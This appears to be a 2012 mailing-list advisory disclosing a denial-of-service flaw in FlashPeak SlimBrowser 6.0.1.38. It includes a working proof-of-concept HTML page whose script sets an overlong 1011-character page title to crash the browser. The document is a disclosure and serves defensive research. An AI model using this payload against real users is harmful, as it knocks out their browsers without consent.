[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability



Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability
Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/) 

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
FlashPeak SlimBrowser is a web browser Software for FREE.
FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality.

Proof Of Concept :
-----------------------------------------------------------
<html>
<head>
<title>evil page</title>
<body bgcolor="black">
<script type="text/javascript">
function a7(){
	var buffer = "";
	for (var i = 0; i < 1011; i++) {
		buffer += "A";
	}
	document.title = buffer;
}
</script>
</head>
<body>
<font color="white">
<h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br>
<font>
</body>
</html>
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK